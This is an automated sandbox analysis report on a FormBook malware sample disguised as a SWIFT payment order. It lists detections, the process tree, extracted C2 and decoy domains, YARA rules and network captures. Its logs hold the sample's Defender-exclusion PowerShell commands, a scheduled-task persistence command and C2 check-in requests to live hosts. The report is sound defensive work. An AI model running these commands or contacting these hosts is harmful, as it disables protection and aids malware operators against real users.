Loading ...

Play interactive tourEdit tour

Windows Analysis Report TT_SWIFT_Export Order_noref S10SMG00318021.exe

Overview

General Information

Sample Name:TT_SWIFT_Export Order_noref S10SMG00318021.exe
Analysis ID:528704
MD5:fff91c58119d3cd7f68457e8565f7116
SHA1:4201eb7214bd3658889739e4856412b8063e0405
SHA256:f8c0d385ece89cd926b2c74680c036f9927414955e7ff4ed12b576470b8c1745
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TT_SWIFT_Export Order_noref S10SMG00318021.exe (PID: 3456 cmdline: "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe" MD5: FFF91C58119D3CD7F68457E8565F7116)
    • powershell.exe (PID: 2540 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6252 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6360 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • TT_SWIFT_Export Order_noref S10SMG00318021.exe (PID: 6448 cmdline: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe MD5: FFF91C58119D3CD7F68457E8565F7116)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • autochk.exe (PID: 1884 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
      • help.exe (PID: 4592 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.liberia-infos.net/46uq/"], "decoy": ["beardeddentguy.com", "envirobombs.com", "mintbox.pro", "xiangpusun.com", "pyjama-france.com", "mendocinocountylive.com", "innovativepropsolutions.com", "hpsaddlerock.com", "qrmaindonesia.com", "liphelp.com", "archaeaenergy.info", "18446744073709551615.com", "littlecreekacresri.com", "elderlycareacademy.com", "drshivanieyecare.com", "ashibumi.com", "stevenalexandergolf.com", "adoratv.net", "visitnewrichmond.com", "fxbvanpool.com", "aarondecker.online", "environmentalkivul.com", "cardsncrepes.com", "hopdongdientu-viettel.com", "thebroughtguarantee.com", "howtofindahotniche.com", "1678600.win", "pityana.com", "akconsultoria.com", "markazkreasindo.com", "ronniecapitol.com", "tailsontour.com", "abros88.com", "laboratoriodentaltj.com", "fuckingmom86.xyz", "5pz59.com", "centralmadu.com", "ispecwar.com", "otetransportanddispatching.com", "cartaovirtual.net", "hsadmin.xyz", "xn--12c2bed4dxay5cxdh1s.online", "oki-net.com", "scenekidfancams.com", "preciousmugs.com", "754711.com", "helpigservices.com", "blueharepress.com", "xmshzs.com", "lovelycharlestonhomes.com", "wamhsh.com", "burlesquercize.com", "oppoexch.com", "ditjai.tech", "the-hausd-group.com", "loosebland.website", "syntheticloot.net", "gzfusco.com", "www-by.com", "farraztravel.com", "beheld3d.art", "douyababy.space", "elcuerpohumano.xyz", "3soap.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x6b18:$sqlite3text: 68 38 2A 90 C5
    • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
    00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 17 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicius Add Task From User AppData TempShow sources
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe" , ParentImage: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, ParentProcessId: 3456, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp, ProcessId: 6360
          Sigma detected: Powershell Defender ExclusionShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe" , ParentImage: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, ParentProcessId: 3456, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, ProcessId: 2540
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe" , ParentImage: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, ParentProcessId: 3456, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, ProcessId: 2540
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132823638078737098.2540.DefaultAppDomain.powershell

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.liberia-infos.net/46uq/"], "decoy": ["beardeddentguy.com", "envirobombs.com", "mintbox.pro", "xiangpusun.com", "pyjama-france.com", "mendocinocountylive.com", "innovativepropsolutions.com", "hpsaddlerock.com", "qrmaindonesia.com", "liphelp.com", "archaeaenergy.info", "18446744073709551615.com", "littlecreekacresri.com", "elderlycareacademy.com", "drshivanieyecare.com", "ashibumi.com", "stevenalexandergolf.com", "adoratv.net", "visitnewrichmond.com", "fxbvanpool.com", "aarondecker.online", "environmentalkivul.com", "cardsncrepes.com", "hopdongdientu-viettel.com", "thebroughtguarantee.com", "howtofindahotniche.com", "1678600.win", "pityana.com", "akconsultoria.com", "markazkreasindo.com", "ronniecapitol.com", "tailsontour.com", "abros88.com", "laboratoriodentaltj.com", "fuckingmom86.xyz", "5pz59.com", "centralmadu.com", "ispecwar.com", "otetransportanddispatching.com", "cartaovirtual.net", "hsadmin.xyz", "xn--12c2bed4dxay5cxdh1s.online", "oki-net.com", "scenekidfancams.com", "preciousmugs.com", "754711.com", "helpigservices.com", "blueharepress.com", "xmshzs.com", "lovelycharlestonhomes.com", "wamhsh.com", "burlesquercize.com", "oppoexch.com", "ditjai.tech", "the-hausd-group.com", "loosebland.website", "syntheticloot.net", "gzfusco.com", "www-by.com", "farraztravel.com", "beheld3d.art", "douyababy.space", "elcuerpohumano.xyz", "3soap.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeReversingLabs: Detection: 35%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://www.hpsaddlerock.com/46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3Avira URL Cloud: Label: malware
          Source: www.liberia-infos.net/46uq/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\AnsPejV.exeReversingLabs: Detection: 35%
          Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
          Source: Binary string: help.pdbGCTL source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp
          Source: Binary string: help.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49823 -> 154.196.11.204:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49823 -> 154.196.11.204:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49823 -> 154.196.11.204:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.innovativepropsolutions.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.aarondecker.online
          Source: C:\Windows\explorer.exeDomain query: www.754711.com
          Source: C:\Windows\explorer.exeDomain query: www.pyjama-france.com
          Source: C:\Windows\explorer.exeDomain query: www.wamhsh.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.hpsaddlerock.com
          Source: C:\Windows\explorer.exeDomain query: www.blueharepress.com
          Source: C:\Windows\explorer.exeNetwork Connect: 156.226.250.165 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.liberia-infos.net/46uq/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
          Source: global trafficHTTP traffic detected: GET /46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3 HTTP/1.1Host: www.wamhsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB HTTP/1.1Host: www.pyjama-france.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 HTTP/1.1Host: www.hpsaddlerock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y HTTP/1.1Host: www.aarondecker.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 16:31:46 GMTServer: ApacheContent-Length: 260Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 77 61 6d 68 73 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.wamhsh.com Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Nov 2021 16:31:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 183X-Sorting-Hat-ShopId: 51998097592X-Request-ID: dbaee5ab-3952-40fa-97f1-8e4299a03f3aX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west1CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6b3c4509ccd05b7a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 